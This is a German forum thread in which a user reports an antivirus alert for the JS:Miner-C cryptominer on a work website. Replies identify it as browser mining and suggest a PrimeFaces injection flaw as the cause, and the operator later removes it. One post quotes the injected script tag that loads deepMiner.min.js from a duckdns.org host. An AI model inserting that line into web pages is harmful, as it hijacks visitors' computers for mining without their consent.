kostenloser Webspace werbefrei: lima-city


Virus JS:Miner-C

lima-cityForumDie eigene HomepageSicherheit im Internet

  1. Autor dieses Themas

    mein-wunschname

    mein-wunschname hat kostenlosen Webspace.

    Beim Aufruf einer bestimmten Website meldet mein Virenschutz von AVG, dass eine Bedrohung durch den Virus JS:Miner-C gesichert wurde.

    https://www.dropbox.com/s/ikr51cw6ceryttw/virus-screenshot.jpg?dl=0

    Ich habe daraufhin den Betreiber der Website informiert. Der meint, mein PC sei infiziert. Im Quellcode der Seite (Adresse kann ich hier nicht nennen, da ich dort beruflich unterwegs bin und die Seite ohnehin nur nach Anmeldung aufrufbar ist) finde ich die Zeile:

    <script src="https://jhondi33.duckdns.org:7777/deepMiner.min.js"></script>

    Das scheint ganz offensichtlich der Aufruf des Schädlings zu sein. Im Internet findet man bei entsprechender Suche noch andere Seiten, die so infiziert sind. Auf solchen Seiten und nur dort macht mein Virenschutz Alarm.
    Trotzdem verunsichert mich die Aussage des Seitenbetreibers. Ich habe natürlich schon mal eine Scan mit AVG und auch Malwarebyte gemacht, brachte aber keine Ergebnisse.

    Was meint ihr zu dieser Sache?
  2. Diskutiere mit und stelle Fragen: Jetzt kostenlos anmelden!

    lima-city: Gratis werbefreier Webspace für deine eigene Homepage

  3. h***********r

    Das sieht mir in dem Kontext js und miner so aus als wäre auf der Website einfach ein js Cryptominer der von deinem ab blockiert wird.
    Und da das js Script runter geladen wird um das im Browser clientseitig auszuführen ist ja auch logisch.

    Aber mit ein bisschen Google hätte man das auch raus finden können

    Beitrag zuletzt geändert: 28.1.2018 13:07:50 von horstexplorer
  4. invalidenturm

    Kostenloser Webspace von invalidenturm

    invalidenturm hat kostenlosen Webspace.

    Primefaces ist ein populäres open Source Framework, und dort sitzt vermutlich in älteren Versionen die genutzte Sicherheitslücke https://www.primefaces.org/primefaces-el-injection-update/. Du solltest also mal den Betreiber der betreffenden Webseite fragen ob er zufällig Primefaces verwendet.
  5. Autor dieses Themas

    mein-wunschname

    mein-wunschname hat kostenlosen Webspace.

    Ca. 72h nachdem ich den Betreiber auf die von seiner Website ausgehende Virenbedrohung aufmerksam gemacht habe wurde das nun entfernt.
    @invalidenturm: dein Hinweis ist interessant. Allerdings handelt es sich wirklich eine etwas größere Firma, die einzelnen Supportmitarbeiter werden die Interna nicht kennen.
    Da nun klar ist, dass nicht mein PC sondern die Website der Verursacher ist kann der thread meinetwegen geschlossen werden.


    Beitrag zuletzt geändert: 29.1.2018 9:16:41 von mein-wunschname
  6. Diskutiere mit und stelle Fragen: Jetzt kostenlos anmelden!

    lima-city: Gratis werbefreier Webspace für deine eigene Homepage

Dir gefällt dieses Thema?

Über lima-city

Login zum Webhosting ohne Werbung!